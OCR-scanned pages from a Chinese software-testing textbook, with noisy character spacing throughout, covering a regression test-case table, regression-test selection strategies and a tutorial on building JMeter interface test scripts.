Toana managers before they are listed 


on the site 





Correctness of application data- 
Trial Application can be down- |all these applications are ONLY 
loaded testing application. Please con- 
centrate on functionality 





Download applications that re- 


Write a Review when signed À 
quired payment 





Number of reviews listed = 
Number of reviews mentioned 
on application details 





Download Details; all seven 
fields are listed; Download 
Size, Language, Release Date, 
Company, Website, Cust Sup- 
port. Compatible With. NO 
MANDATORY fields can be 
empty 

Download Details: link is func- 
tional and work as expected 
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续 表 
Feature What To Test What NOT to Test Pass/Fail 








Application-Publisher |New Applications can be crea- 
Workflow ted 


New Applications can be pre- 


























view it 
Filters 
Link is functional Correctness of link name 
Link directs user to the right 
Spelling 
page 
Link shows the right number of 
applications 
Sign In Sign In is functional Sign In Dialog: UI alignments 
Account Settings 
My Uploads Unpublished applications are 


listed 


Application display information 





entered when they were created 





Applications can be deleted 





Applications can be edited 





Downloaded applications are lis- 
ted 


(more) (less) links are func- 


My Downloads 





tional 





: " Subscriber only app only can be 
Subscribe Entitlement . 
downloaded by subscriber user 





Subscriber free apps are free- 
downloaded for subscriber user 





Subscriber free apps are non- 
Íree downloaded for non-sub- 


scriber user 





Subscriber only app can NOT 
be downloaded by non-subscrib- 


er user 

















DS 专家 点 评 


选择 回归 测试 策略 应 该 兼顾 效率 和 有 效 性 两 个 方面 。 常 用 的 回归 测试 的 方式 包括 如 下 
几 种 。 

1. 再 测试 全 部 用 例 

选择 基线 测试 用 例 库 中 的 全 部 测试 用 例 组 成 回归 测试 包 , 这 是 一 种 比较 安全 的 方法 。 
再 测试 全 部 用 例 中 具有 最 低 的 遗漏 回归 错误 风险 ,但 测试 成 本 最 高 。 再 测试 全 部 用 例 几 乎 
可 以 应 用 到 任何 情况 下 ,基本 上 不 需要 进行 分 析 和 重新 开发 ,但 是 , 随 着 开发 工作 的 进展 , 测 


实验 15 ”设计 回归 测试 类 测试 用 例 


试用 例 的 不 断 增 多 ,重复 原先 所 有 的 测试 将 带 来 很 大 的 工作 量 ,往往 超出 了 预算 和 进度 。 

2. 基于 风险 选择 测试 

可 以 基于 一 定 的 风险 标准 来 从 基线 测试 用 例 库 中 选择 回归 测试 包 。 首 先 运行 最 重要 
的 、 关 键 的 和 可 疑 的 测试 用 例 , 而 跳 过 那些 非 关键 的 ,优先 级 别 低 的 或 者 高 稳定 的 测试 用 例 ， 
因为 这 些 用 例 即 便 可 能 测试 到 缺陷 ,缺陷 的 严重 性 也 仅 有 三 级 或 四 级 。 一 般 而 言 ,测试 按 从 
主要 特征 到 次 要 特征 进行 。 

3. 基于 操作 剖面 选择 测试 

如 果 基 线 测 试用 例 库 中 的 测试 用 例 是 基于 软件 操作 剖面 开发 的 ,测试 用 例 的 分 布 情况 
反映 了 系统 的 实际 使 用 情况 ,那么 回归 测试 所 使 用 的 测试 用 例 个 数 可 以 由 测试 预算 确定 , 回 
归 测 试 可 以 优先 选择 那些 针对 最 重要 或 最 频繁 使 用 功能 的 测试 用 例 , 释 放 和 缓解 最 高 级 别 
的 风险 ,有 助 于 尽早 发 现 那些 对 可 靠 性 有 最 大 影响 的 故障 。 这 种 方法 可 以 在 一 个 给 定 的 预 
算 下 最 有 效 地 提高 系统 可 靠 性 ,但 实施 起 来 有 一 定 的 难度 。 

4. 再 测试 修改 的 部 分 

当 测 试 者 对 修改 的 局 部 化 有 足够 的 信心 时 ,可 以 通过 相依 性 分 析 识 别 软件 的 修改 情况 
并 分 析 修 改 的 影响 ,将 回归 测试 局 限于 被 改变 的 模块 和 它 的 接口 上 。 通 常 ,一 个 回归 错误 一 
定 涉及 一 个 新 的 、 修 改 的 或 删除 的 代码 段 。 在 允许 的 条 件 下 ,回归 测试 应 尽 可 能 履 盖 受到 影 
响 的 部 分 。 

再 测试 全 部 用 例 的 策略 是 最 安全 的 策略 ,但 已 经 运行 过 许多 次 的 回归 测试 不 太 可 能 出 
现 新 的 错误 ,而且 很 多 时 候 , 由 于 时 间 、 人员、 设备 和 经 费 的 原因 ,不 允许 选择 再 测试 全 部 用 
例 的 回归 测试 策略 ,此 时 ,可 以 选择 适当 的 策略 进行 缩减 的 回归 测试 。 

本 例 中 的 回归 测试 用 例 的 选择 , 仅 选 择 了 与 代码 修改 相关 的 模块 与 功能 的 测试 。 并 且 
在 What NOT to Test 中 指出 了 哪些 模块 或 功能 与 代码 的 修改 没有 任何 关系 ,可 以 不 需要 
再 测试 。 


W 拓展 训练 


如 果 学 生 / 老 师 有 自己 动手 设计 的 网 站 或 应 用 ,可 以 自己 修改 一 些 功 能 代码 ,然后 尝试 
设计 回归 测试 用 例 。 

提醒 ; 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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读书 笔记 
44 e$; 44; e@; «4; e@; «4: e@; ^4; e: ^4; o4: ^4; e: 


读书 笔记 Name: Date: 








励志 名 句 : Confidence o f success is almost success. 





对 成 功 抱 有 信心 ,就 近乎 成 功 。 
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使 用 测试 工具 实 训 


【 本 篇 导读 】 


本 篇 通过 对 自动 化 测试 工具 JMeter、GT， 
安全 测试 工具 ZAP、Burpsuite， 性 能 测试 工具 
WRK、WebLOAD 六 大 工具 的 使 用 展示 ,体现 工 
具 在 特定 场合 的 重要 作用 。 

本 篇 不 仅 讲解 不 同 工 具 如 何 安装 与 使 用 ， 同 
时 还 与 实际 项 目 相 结合 。 引 导读 者 在 项 目 中 使 用 
工具 、 对 软件 测试 工具 产生 兴趣 。 不 同 的 工具 有 
不 同 的 使 用 场景 ， 在 实际 项 目 中 ， 用 对 工具 可 
以 事半功倍 ; 用 错 工具 则 会 里 足 不 前 ,拖累 项 
目 进 程 。 

对 工具 不 仅仅 要 会 使 用 ,还 要 能 对 工具 产生 
的 结果 进行 分 析 ， 有 时 还 需要 进行 配置 调 优 。 工 
具 大 多 支持 二 次 开发 ， 有 的 工具 可 能 在 某 些 方面 
不 满足 自己 产品 的 需要 或 者 可 以 对 工具 本 身 做 些 
定制 与 功能 增强 ,这 就 需要 花费 更 多 的 精力 对 测 
试 工具 进行 整合 与 优化 ,以 及 在 此 基础 上 进行 二 
次 开发 。 














自动 化 测试 工具 JMeter 训练 | 


EZREK ) 


实施 自动 化 测试 的 目标 和 意义 : 对 于 功能 已 经 完整 和 成 熟 的 软 
件 ,每 发 布 一 个 新 的 版 本 ,其 大 部 分 功能 和 界面 都 与 上 一 个 版 本 相似 
或 完全 相同 ,这 部 分 功能 特别 适合 于 自动 化 测试 ,从 而 可 以 让 测试 达 
到 测试 每 个 特征 的 目的 。 将 烦琐 的 任务 转化 为 自动 化 测试 ,可 以 增加 


软件 信任 度 。 


一 个 系统 的 功能 点 有 成 千 上 万 个 ,人 工 测试 非常 耗 时 和 烦琐 , 必 
然 会 使 测试 效率 低下 。 人 掌握 几 种 测试 工具 的 使 用 方法 是 测试 工程 师 
技能 的 加 分 项 。 本 实验 通过 JMeter 的 介绍 安装、 使 用 与 实际 操作 ， 


展示 自动 化 工具 的 使 用 方法 ,让 读者 可 以 快速 上 手 。 


16.1 JMeter 简介 


JMeter 是 100% 纯 Java 桌面 应 用 程序 ,被 设计 用 来 测试 客户 端 / 
服务 器 结构 的 软件 (例如 Web 应 用 程序 ) 。 它 可 以 用 来 测试 包括 基于 
静态 和 动态 资源 程序 的 性 能 ,例如 静态 文件 Java Servlets, Java 对 
Z BEE FTP 服务 器 等 。JMeter 可 以 用 在 一 个 服务 器 、 网 络 或 者 
对 象 上 模拟 重负 载 来 测试 它 的 强度 或 者 分 析 在 不 同 的 负载 类 型 下 的 


全 面 性 能 。 


另外 ,JMeter 能 够 通过 断言 来 创建 测试 脚本 以 验证 应 用 程序 是 
否 返 回 了 期 望 结果 ,从 而 帮助 回归 测试 程序 。JMeter 允许 使 用 正则 


表达 式 创建 断言 ,以 提供 最 大 的 灵活 性 。 


JMeter 最 初 用 作 性 能 测试 ,重新 设计 后 ,还 可 以 用 作 接 口 自动 化 
测试 。 这 里 主要 介绍 JMeter 用 作 接 口 自动 化 测试 ,持续 集成 的 接口 


测试 架构 如 图 16-1 所 示 。 
1. JMeter 的 作用 与 特点 


(1) 能 够 对 HTTP 和 FTP 服务 器 进行 压力 和 性 能 测试 ,也 可 以 


对 任何 数据 库 进行 同样 的 测试 (通过 JDBC)。 
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更 新 
COE 
提交 














测试 人 员 图 形 界面 组 织 用 例 
[NW 
HTTP Request 
[ — EE ENS 
Hudson 服 务 器 








JDBC Request 


[ == ] 


图 16-1 持续 集成 的 接口 测试 架构 


(2) 完全 的 可 移植 性 和 100% 纯 Java. 

(3) 完全 Swing 和 轻 量 组 件 支持 ( 预 编译 的 JAR 使 用 javax. swing.* ) 包 。 

(4) 完全 多 线程 框架 允许 通过 多 个 线程 并 发 取样 和 通过 单独 的 线程 组 对 不 同 的 功能 同 
时 取样 。 

(5) 精心 的 GUI 设计 ,允许 快速 操作 和 更 精确 的 计时 。 

(6) 缓存 和 离线 分 析 / 回 放 测试 结果 。 

2. JMeter 的 高 可 扩展 性 

CD 可 链接 的 取样 器 允许 无 限制 的 测试 能 力 。 

(2) 各 种 负载 统计 表 和 可 链接 的 计时 器 可 供 选 择 。 

(3) 数据 分 析 和 可 视 化 插件 提供 了 很 好 的 可 扩展 性 以 及 个 性 化 。 

(4) 具有 提供 动态 输入 到 测试 的 功能 (包括 JavaScript), 

(5) 支持 脚本 编程 的 取样 器 (在 1. 9. 2 及 以 上 版 本 支持 BeanShell) 。 











16.2 JMeter 安装 和 运行 


16.2.1 安装 JMeter 


(1) JMeter 下 载 地 址 为 http://jmeter. apache. org/download_jmeter. cgi。 

访问 JMeter 官网 ,下 载 JMeter 最 新 版 本 ,如 图 16-2 所 示 。 

(2) JMeter 的 运行 需要 Java 环境 ,至 少 为 JDK1. 6 版 本 。JDK 环境 配置 完成 后 ,运行 
JMeter, 

(3) 解压 从 官网 下 载 的 JMeter 安装 包 到 本 地 目录 ,因为 要 增 量 存放 脚本 ,所 以 建议 尽 
量 安装 到 非 C 盘 目录 下 。 


16.2.2 运行 JMeter 


在 解压 后 的 JMeter 的 安装 目录 下 找到 bin 文件 ,双击 jmeter. bat 文件 , 稍 后 即 可 启动 
JMeter 图 形 界面 ,如 图 16-3 所 示 。 
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erce (P. jmeter apache org/downioad jmeter coi ~ jo 
e Change History fe 
HM For more information concerning Apache JMeter, see the Apache JMeter ste. 
* FAQ (Wiki) 
kr WSB Apache JMeter 3.3 (Requires Java 8. JMeter 3.3 
$ JUnit Sampler does not yet support Java 9.) 
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图 16-3 JMeter 图 形 界面 


一 个 简单 测试 包含 的 基本 元 件 : Test plan (ñ iX iT Xil) — Thread Group (线程 组 ) 一 
Sampler( 取 样 器 ) 一 Assertions (断言 ) 和 Listener( 监 听 器 ) 。 


16.3 JMeter 功能 使 用 


使 用 JMeter 写 自动 化 脚本 ,通常 是 在 一 个 测试 计划 下 创建 多 个 线程 组 ,而 且 每 个 线程 
组 下 还 有 多 个 Sampler 和 断言 组 成 的 用 例 ,最 后 再 放 一 个 监听 器 统计 测试 结果 。 
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16.3.1 线程 组 


每 次 打开 JMeter 图 形 界面 ,测试 计划 和 工作 台 都 已 建 好 ,选择 测试 计划 , 右 击 并 选择 
“添加 ”一 Threads (Users) 命 令 , 列 出 线程 组 的 3 种 选项 ,如 图 16-4 所 示 。 





















































ff MCEBERUSTS, 注册 失败 
UA 2 两 于 再 不 一 至 ， 注 册 兴 败 


fuf 3、 用 户 各 为 空 , pilih 
+ Z A 信息 正确 ， 注册 成 功 












































图 16-4 ”新 建 线程 组 


线程 组 分 为 Setup Theread Group, terDown Thread Group 和 Thread Group。 其 中 ， 
Thread Group 是 标准 线程 组 ; Setup Thread Group 是 在 Test 开始 先 被 执行 的 Thread 
Group (方便 用 户 做 Testing 的 初始 化 ) ; 而 Teardown Thread Group 是 在 所 有 其 他 类 型 的 
Thread Group 结束 后 执行 的 Thread Group (方便 做 Cleanup 的 工作 )。 

这 3 种 线程 组 只 是 名 字 不 一 样 ,创建 之 后 ,其 界面 是 完全 一 样 的 。 


16.3.2 配置 元 件 


配置 元 件 (config element) 用 于 提供 对 静态 数据 配置 的 支持 ,相当 于 预 置 数据 。CSV 
Data Set config 可 以 将 本 地 数据 文件 形成 数据 池 (data pool) ,而 对 应 于 HTTP Request 
Sampler 和 TCP Request Sampler 等 类 型 的 配置 元 件 则 可 以 修改 Sampler 的 默认 数据 。 

1. CSV Data Set Config 

添加 CSV Data Set Config 元 件 , 可 以 将 普通 用 户 名 和 密码 参数 化 ,循环 读 取 文本 中 的 
用 户 名 和 密码 ,用 于 登录 操作 。 首 先 ,在 Excel 表格 里 新 建 一 份 CSV 格式 的 文档 ,如 图 16-5 
所 示 。 

然后 在 JMeter 中 选择 需要 参数 化 的 某 个 请 求 ,选择 “添加 ”一 “配置 元 件 ”>CSV Data 
Set Config, 会 添加 一 个 CSV Data Set Config, 需 要 设置 相关 的 一 些 内 容 ,具体 如 图 16-6 
所 示 。 

Filename: 文件 名 , 指 保存 信息 的 文件 目录 ,可 以 为 相对 路 径 或 者 绝对 路 径 ,例如 EN 


user. csv, 
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1 sms test123 
2 |1J test123 
3 zer test123 
n 
6 
7 
8 
9 











图 16-5 新 建 CSV 文档 












































16-6 CSV Data Set Config 配置 


Variable Names: 参数 名 称 ,多 个 参数 名 称 中 间 用 英文 格式 的 逗号 分 隔 。 
接着 是 在 请 求 中 引用 参数 ,如 图 16-7 所 示 。 
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167 引用 参数 
操作 结果 如 图 16-8 所 示 。 


CSV Data Set Config 只 是 简单 地 引用 已 知 用 户 名 和 密码 ,是 最 开始 的 实验 ,后 面 会 对 
脚本 进行 修改 ,使 脚本 更 加 健壮 。 
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图 16-8 操作 结果 


2. JDBC Connection Configuration 
在 平时 工作 中 ,数据 库 的 应 用 非常 多 ,在 JMeter 中 要 使 用 数据 库 ,首先 需 在 配置 元 件 中 
进行 数据 库 配置 ,如 图 16-9 所 示 。 
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16-9 JDBC Connection Configuration 配置 


Variable Name: 数据 库 连 接 池 的 变量 名 .之 后 JDBC Request 可 以 通过 选择 不 同 的 连 
接 池 名 选择 不 同 的 数据 库 连接 。 

Max Number of Connections; 该 数据 库 连 接 池 的 最 大 连接 数 , 一 般 设置 为 0, 意思 是 每 
个 线程 都 使 用 单独 的 数据 库 连接 ,线程 之 间 数 据 库 连接 不 共享 。 

Database URL: jdbc:oracle:thin; (9 / /hostname: port/sid. fij ifii ffJ jdbc:oracle:thin:@ 
部 分 是 固定 的 JDBC Driver class. Oracle [5l zz 8 oracle. jdbc. OracleDriver ,其 他 数据 库 可 以 
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查看 帮助 。 
数据 库 连 接 配置 好 以 后 ,取样 器 的 JDBC 请 求 即 可 工作 。 
3. 用 户 自 定义 变量 
用 户 自 定义 变量 和 HTTP 信息 头 管理 类 似 ,都 是 用 户 自 定义 变量 ,如 图 16-10 所 示 。 
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图 16-10 用 户 自 定义 变量 


配置 元 件 就 是 为 取样 器 提供 脚本 运行 中 需要 用 到 的 参数 ,用 什么 配置 什么 ,脚本 维护 方 
便 。 这 里 将 用 户 名 以 wl. 开头 .1 一 999 随机 生成 的 数字 组 合 而 成 ,每 次 执行 脚本 用 户 名 都 不 
一 样 , 就 可 保证 每 次 都 为 新 注册 用 户 。 如 果 脚 本 执行 次 数 较 多 ,可 调整 随机 数 范围 


16.3.3 逻辑 控制 器 


32 AR Fc dil ie nj LA Jg WES; 一 类 用 来 控制 测试 计划 中 取样 器 节点 发 送 请 求 的 逻辑 顺 
序 , 常 用 的 有 如 果 (If) 控 制 器 .Switch Controller, Runtime Controller, 循环 控制 器 等 ; 另 一 
类 与 节点 逻辑 执行 顺序 无 关 , 用 于 对 测试 计划 中 的 脚本 进行 分 组 ,方便 JMeter 统计 执行 结 
果 以 及 进行 脚本 的 运行 时 控制 等 ,如 事务 控制 回春 吐 量 控制 器 等 。 

选择 “线程 组 ”, 右 击 并 选择 "添加 ”~ 逻辑 控制 器 ?命令 ,在 弹出 的 子 菜单 中 选择 合适 的 
逻辑 控制 器 ,如 图 16-11 Bron o 

逻辑 控制 器 数量 众多 ,这 里 只 挑选 几 种 常用 的 进行 介绍 。 

1. 事务 控制 器 

事务 控制 器 是 用 得 最 多 的 控制 器 。 事 务 控制 器 会 产生 一 个 额外 的 取样 器 ,用 来 计算 衡 
量 它 所 包含 的 所 有 测试 组 件 ( 例 如 包含 两 个 HTTP 采样 器 ) 的 总 体 时 间 。 在 “查看 结果 树 ” 
监听 器 中 ,事务 控制 器 只 有 在 其 子 采样 器 都 成 功 的 情况 下 才 显示 成 功 , 如 图 16-12 所 示 。 

选中 事务 控制 器 页 面 的 Generate parent sample, 选 中 该 配置 项 ,在 结果 中 则 不 会 看 到 
事务 控制 器 所 包含 的 所 有 子 请 求 ,事务 控制 器 下 的 各 个 取样 器 只 有 在 结果 树 里 才能 看 
到 ; 同时 , 子 取 样 器 的 数据 也 不 会 在 CSV 文件 中 显示 ,但 是 在 XML 文件 中 可 以 看 到 ,如 
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图 16-11 添加 逻辑 控制 器 
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图 16-13 Bras 。 


16-12 事务 控制 器 


用 户 退 出 没有 勾 选 事务 控制 器 页 面 的 Generate parent sample, 出 来 的 结果 就 没有 用 户 
注册 和 用 户 登录 用 例 下 的 逻辑 清楚 。 

线程 组 下 的 一 个 事务 控制 器 相当 于 一 条 用 例 , 写 清楚 用 例 标题 注释 ,其 下 取样 器 写 好 
前 置 条 件 ,测试 步骤 和 断言 ,结构 有 顺序 ,目录 清晰 ,调试 的 时 候 就 能 少 走 很 多 弯路 。 


2. 如 果 (If) 控 制 器 


这 是 一 个 很 常用 的 逻辑 控制 器 ,类 似 于 编程 语言 中 的 if 语句 ,根据 给 定 表达 式 的 值 决 
定 是 否 执行 该 节点 下 的 子 节点 ,如 图 16-14 所 示 。 
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16-13 ”是 否 勾 选 Generate parent sample 的 区 别 
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图 16-14 如 果 (If) 控 制 器 


条 件 判断 语句 如 果 是 字符 串 ,一 定 要 加 上 引号 。 鼠 标 指针 放 在 条 件 判 断 语句 输入 框 ,会 
出 现 提示 ,展示 样 例 , 当 判定 条 件 为 真 时 ,执行 该 节点 下 的 子 节点 。 图 16-14 中 需要 判断 的 
是 ,如 果 上 一 步 注册 成 功 ,再 执行 第 5 步 时 ,提示 这 个 用 户 名 已 存在 。 

3. 循环 控制 器 

循环 控制 器 用 于 指定 其 下 子 节点 循环 次 数 . 是 应 用 场景 比较 多 的 一 种 控制 器 ,界面 非常 
简单 ,如 图 16-15 所 示 。 

值得 注意 的 是 ,新 建 线程 组 时 则 样 有 关于 循环 次 数 的 设 定 , 如 果 线 程 组 循环 次 数 为 N 
次 ,而 循环 控制 器 循环 次 数 为 M 次 ,那么 循环 控制 器 下 的 子 节点 循环 的 次 数 为 NXM K. 
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图 16-15 循环 控制 器 


4. 否 吐 量 控制 器 
吞吐 量 控制 器 允许 用 户 控 制 执行 频率 ,JMeter 提供 了 两 种 模式 : 执行 百分比 和 执行 总 
次 数 。 图 16-16 中 各 参数 说 明 如 下 。 


事务 控制 器 jmx (DV 2 E JMeter (3.3 11808647) 
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图 16-16 吞吐 量 控制 器 


(1) Percent Executions: 按 百 分 比 来 指定 执行 次 数 。 选 择 此 模式 , 甜 吐 量 值 的 单 
位 为 %。 

(2) Total Executions( 单 击 Percent Executions 后 的 下 拉 按 钮 会 出 现 ) ; Tk f ut Bz (E 3 
指定 执行 次 数 。 选 择 此 模式 ,吞吐 量 值 的 单位 为 “次 ”。 

(3) 吞吐 量 : 该 值 可 以 是 任意 整数 ,如 果 小 于 或 等 于 0, 则 一 次 也 不 执行 。 
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(4) Per User: 如 果 勾 选 该 项 , 则 按 虚拟 用 户 数 (线程 数 ) 来 计算 执行 次 数 ; 如 果 没 有 勾 
选 该 项 , 则 按 所 有 虚拟 用 户 数 来 计算 执行 次 数 。 

Per User 选项 的 用 处 如 下 。 

勾 选 : 会 按照 每 个 线程 单独 计算 吞吐 量 , 如 线程 组 设置 了 5 个 线程 循环 次 数 为 2 的 情 
况 ,吞吐 量 为 1 时 ,吞吐 量 的 子 节点 每 个 线程 执行 1 次 ,总 共 会 执行 5 次 。 

不 勾 选 : 按照 全 局 的 执行 数 次 进行 计数 ,如 线程 组 设置 了 5 个 线程 ,循环 次 数 为 2 的 情 
况 ,吞吐 量 为 1 时 ,吞吐 量 的 子 节点 仅 会 执行 1 次 。 


16.3.4 取样 器 


取样 器 向 服务 器 发 送 请 求 ,记录 响应 信息 ,记录 响应 时 间 的 最 小 单元 。JMeter 支持 多 
种 不 同 的 取样 器 ,如 HTTP 请 求 .FTP 请 求 .TCP 取样 器 、JDBC Request 等 ,每 一 种 不 同类 
型 的 取样 器 可 以 根据 设置 的 参数 向 服务 器 发 出 不 同类 型 的 请 求 ,如 图 16-17 所 示 。 
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图 16-17 取样 器 


1. HTTP 请 求 

HTTP 请 求 取样 器 基于 HTTP 协议 发 送 与 接收 请 求 ,操作 非常 简单 ,如 图 16-18 所 示 。 

接口 测试 常用 的 HTTP 请 求 方法 是 POST 和 GET. Parameters 和 Body Data 只 能 二 
选 一 ,不 可 同时 选择 。Body Data 的 请 求 体 可 以 多 种 ,还 可 以 是 JSON 格式 的 请 求 。 

2. JDBC Request 

实际 工作 中 ,数据 库 是 必 不 可 少 的 ,JMeter 有 专门 的 数据 库 操作 。JDBC Request 需要 
与 配置 元 件 中 JDBC Connection Configuration 结合 使 用 ,操作 界面 如 图 16-19 所 示 。 

SQL 中 含 变量 在 所 难免 , 当 需 要 填 入 变量 时 可 以 用 ? 代替 变量 ,在 Parameter values £ 
数值 ) 中 输入 变量 值 ,在 Parameter types( 参 数 类 型 ) 中 输入 参数 的 实际 类 型 。 但 这 样 的 变 
量 输入 方式 没有 实际 意义 ,所 以 需要 一 个 真正 的 变量 而 不 是 伪 变 量 。 如 图 16-19 所 示 , 先 在 
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图 16-18 HTTP 请 求 
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图 16-19 JDBC Request 


用 户 定义 时 定义 这 样 一 个 变量 ,操作 的 时 候 直 接 在 操作 语句 中 引用 ,这 样 更 能 体现 自动 化 。 
数据 库 交 互 后 ,可 能 需要 提取 对 应 字段 的 值 ,因此 需要 提取 结果 。 如 图 16-19 所 示 , 先 
设置 输入 变量 (Variable Name) 。 注 意 .输出 变量 值 个 数 若 为 多 个 ,中 间 用 逗号 隔 开 ; 输出 
变量 值 个 数 必须 与 选取 的 个 数 一 致 ,不 能 多 也 不 能 少 。 查 询 的 结果 有 两 列 , 取 其 中 一 个 数 
据 , 使 用 name 1. 
值得 注意 的 是 , 当 增 、 删 、 改 语句 时 ,都 选择 QueryType 为 Update Statement ( Prepared 
Update Statement) ,不 然 执行 完 这 个 节点 会 报错 。 
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16.3.5 定时 器 


定时 器 用 于 设置 操作 之 间 的 等 待 时间 。 等 待 时 间 是 性 能 测试 中 常用 的 控制 客户 端 
QPS 的 手段 。JMeter 定义 了 Bean Shell Timer Constant Throughput Timer、 固 定 定时 器 
等 不 同类 型 的 定时 器 ,如 图 16-20 所 示 。 
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图 16-20 ”定时 器 


这 几 种 定时 器 中 ,用 得 最 多 的 是 固定 定时 器 。 无 论 定 时 器 位 置 在 取样 器 之 前 还 是 下 面 ， 
定时 器 是 在 每 个 取样 器 之 前 执行 的 ,而 不 是 之 后 。 在 执行 一 个 取样 器 之 前 ,所 有 当前 作用 域 
内 的 定时 器 都 会 被 执行 ;如果 和 希望 定时 器 仅 应 用 于 其 中 一 个 取样 器 , 则 把 定时 器 作为 子 节 
点 加 入 ; 如 果 和 希望 在 取样 器 执行 完 之 后 再 等 待 , 则 可 以 使 用 Test Action, 


16.3.6 前 置 处 理 器 


前 置 处 理 器 ( 见 图 16-21) 用 于 在 实际 的 请 求 发 出 之 前 对 即将 发 出 的 请 求 进行 特殊 处 
理 。 例 如 ,HTTP URL 重 写 修饰 符 可 以 实现 URL 重 写 。 当 URL 中 有 sessionID 一 类 的 
session 信息 时 ,可 以 通过 该 处 理 器 填充 发 出 请 求 的 实际 sessionID。 类 似 于 手工 用 例 里 面 
的 预 置 条 件 , 在 取样 器 执行 之 前 用 来 修改 取样 器 的 ,无 法 直接 “查看 结果 树 ” 记 录 。 

1. BeanShell PreProcessor 

使 用 BeanShell 在 请 求 进行 之 前 进行 操作 。 语 法 使 用 与 BeanShell Sampler 相同 ,但 可 
使 用 的 内 置 变量 稍 有 不 同 。 

2. JDBC PreProcessor 

在 请 求 运 行 之 前 进行 数据 库 操作 ,使 用 方法 与 JDBC Request 相同 。 

3. 用 户 参 数 

可 以 让 变量 在 每 个 线程 中 分 别 使 用 不 同 的 值 。 在 多 线程 测试 中 可 以 用 到 ,例如 创建 用 
户 , 用 户 名 不 能 重复 ,但 要 使 用 多 线程 进行 测试 ,如 图 16-22 所 示 。 

前 置 处 理 器 实际 就 是 提前 预 置 一 些 数据 ,例如 修改 数据 库 信息 以 满足 测试 条 件 ,可 单独 
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图 16-21 前 置 处 理 器 
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图 16-22 用户 参数 
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放 在 某 个 取样 器 节点 下 。 
16.3.7 后 置 处 理 器 


后 置 处 理 器 用 于 对 取样 器 发 出 请 求 后 得 到 的 服务 器 响应 进行 处 理 ,一 般 用 来 提取 响应 
中 的 特定 数据 ,如 图 16-23 所 示 。 
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图 16-23 后 置 处 理 器 


1. 正则 表达 式 提取 器 
后 置 处 理 器 用 得 最 多 的 就 是 正则 表达 式 提取 器 ,往往 用 来 提取 某 个 数据 ,如 图 16-24 
所 示 。 
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图 16-24 正则 表达 式 提取 器 
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引用 名 称 : 下 一 个 请 求 要 引用 的 参数 名 称 ,例如 title WH S (ride) 5l HE. 

正则 表达 式 : () 括 起 来 的 就 是 要 提取 的 内 容 ,. 表示 匹配 任何 字符 串 , 十 表示 一 次 或 多 
次 ,? 表示 在 找到 第 一 个 匹配 项 后 停止 。 

模板 : 用 $$ 括 起 来 ,如 果 在 正则 表达 式 中 有 多 个 正则 表达 式 , 则 可 以 是 $2$、$3$ 
等 ,表示 解析 到 的 第 几 个 值 给 title。 如 $1$ 表示 解析 到 的 第 1 个 值 给 title。 

匹配 数字 : 0 代表 随机 取 值 ,1 代表 全 部 取 值 ,通常 情况 下 填 0。 

KA: 如 果 参 数 没 有 取得 到 值 , 那 么 给 它 取 一 个 默认 值 。 

本 例 中 ,第 5 步 需 要 用 到 注册 结果 ,这 里 用 正则 表达 式 提取 出 第 4 步 操作 结果 给 第 5 
步 用 。 

2. JSON Extractor 

正则 表达 式 可 提取 接口 返回 内 容 或 者 数据 库 返 回 内 容 , 对 于 JSON 返回 的 内 容 , 则 需要 
JSON Extractor 提取 。 

3. JDBC PostProcessor 

与 JDBC 请 求 一 样 ,JDBC PostProcessor 可 用 于 对 数据 库 的 清理 操作 。 如 果 之 前 涉及 
数据 库 的 存储 ,为 了 减少 数据 库 的 压力 ,可 以 删除 新 增 的 数据 ,也 可 以 改 回 修改 的 数据 ,以 保 
证 每 次 执行 完 一 个 测试 计划 对 数据 库 原 数据 没有 影响 。 


16.3.8 响应 断言 


响应 断言 用 于 检查 测试 中 得 到 的 相应 数据 等 是 否 符合 预期 ,一般 用 来 设置 检查 点 ,用 以 
保证 测试 过 程 中 的 数据 交互 与 预期 一 致 ,与 手工 用 例 中 期 望 结果 效果 相同 ,如 图 16-25 
所 示 。 
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图 16-25 ”响应 断言 
16.3.9 监听 器 
监听 器 是 用 来 对 测试 结果 数据 进行 处 理 和 可 视 化 展示 的 一 系列 元 件 ,图 形 结果 、 查 
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看 结果 树 、 聚 合 报告 等 ,都 是 经 常用 到 的 元 件 。 登 录 失 败 时 的 查看 结果 树 如 图 16-26 
所 示 。 
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图 16-26 登录 失败 时 的 查看 结果 树 
用 户 登 录 成 功 后 ,继续 执行 语句 ,最 后 用 户 成 功 退 出 登录 ,如 图 16-27 所 示 。 
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图 16-27 退出 登录 


从 执行 结果 来 看 ,绿色 表示 执行 通过 的 脚本 ,红色 表示 执行 不 通过 的 脚本 。 脚 本 中 运用 
了 两 次 如 果 (ID 控 制 器 ,在 用 户 注册 第 4 步 提取 注册 结果 ,第 5 步 判断 是 否 注册 成 功 ,如 果 
注册 成 功 ,第 5 步 提示 用 户 已 注册 ,如 果 注 册 失 败 , 第 5 步 就 不 会 执行 。 还 有 一 个 是 用 户 退 
出 登录 ,用 户 登录 完成 之 后 提取 登录 结果 ,如 果 登 录 成 功 再 执行 用 户 退 出 登录 ,如 果 登 录 失 
败 就 不 执行 退出 登录 ,图 16-26 所 示 为 登录 失败 ,没有 执行 用 户 退 出 登录 。 
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16.4 JMeter 学 习 总 结 


本 章 主要 讲 的 是 JMeter 的 使 用 , 它 是 目前 运用 比较 广 的 工具 。 这 里 主要 总 结 一 下 具体 
思路 。 


16.4.1 怎么 开始 


要 做 智慧 绍兴 网 站 的 自动 化 ,一 开始 不 清楚 接口 ,不 清楚 传 值 ,怎么 下 手 是 一 个 难题 , 除 
了 录制 ,最 好 的 办 法 是 抓 包 ,以 登录 为 例 , 抓 包 结果 如 图 16-28 Bron 。 























图 16-28 抓 包 结果 
从 抓 包 结果 可 以 看 到 登录 的 请 求 方法 .请求 参数 ,以 及 请 求 地 址 ,信息 非常 清楚 。 
16.4.2 登录 一 直 报错 怎么 解决 


一 开始 登录 一 直 报 错 , 就 是 登录 不 上 ,排查 了 各 种 原因 ,发 现 是 Cookie 取 不 到 。 添 加 
HTTP Cookie 管理 器 ,自动 管理 Cookie, 如 图 16-29 所 示 。 
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图 16-29 HTTP Cookie 管理 器 
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不 仅 如 此 ,还 需要 在 JMeter 的 bin 目录 下 的 jmeter. properties 文件 下 将 自动 保存 
Cookie 开关 打开 ,如 图 16-30 所 示 。 
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# CookieManager behaviour - should variable cookies be allowed? 
$ Default is true. Use false to revert to original behaviour 


P aaae Pon c cn 


